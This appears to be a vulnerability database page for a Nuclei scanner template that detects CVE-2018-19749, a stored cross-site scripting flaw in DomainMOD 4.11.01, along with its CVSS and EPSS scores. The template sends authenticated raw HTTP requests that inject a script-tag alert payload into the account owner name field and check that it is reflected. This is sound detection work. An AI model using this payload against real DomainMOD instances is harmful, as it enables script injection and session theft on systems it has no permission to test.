Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-19749
HistoryJul 07, 2022 - 7:59 p.m.

DomainMOD 4.11.01 - Cross-Site Scripting

2022-07-0719:59:18
ProjectDiscovery
github.com
1

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

4.8 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

34.0%

DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
id: CVE-2018-19749

info:
  name: DomainMOD 4.11.01 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://github.com/domainmod/domainmod/issues/81
    - https://www.exploit-db.com/exploits/45941/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2018-19749
    cwe-id: CWE-79
    epss-score: 0.00078
    epss-percentile: 0.33785
    cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: domainmod
    product: domainmod
  tags: cve2018,cve,domainmod,xss,authenticated,edb

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_username={{username}}&new_password={{password}}
      - |
        POST /assets/add/account-owner.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=
      - |
        GET /assets/account-owners.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(header_3, "text/html")'
          - "contains(body_3, '><script>alert(document.domain)</script></a>')"
        condition: and
# digest: 490a00463044022049417fe6bfe7dcc4ad5a03f7e74d98650d87b5d7245e8b3222aa41a4a1809a1702201961b9d27ac98ce526df8f1b59834668eda162155a7a5f7a858d647ea60e7ae0:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

4.8 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

34.0%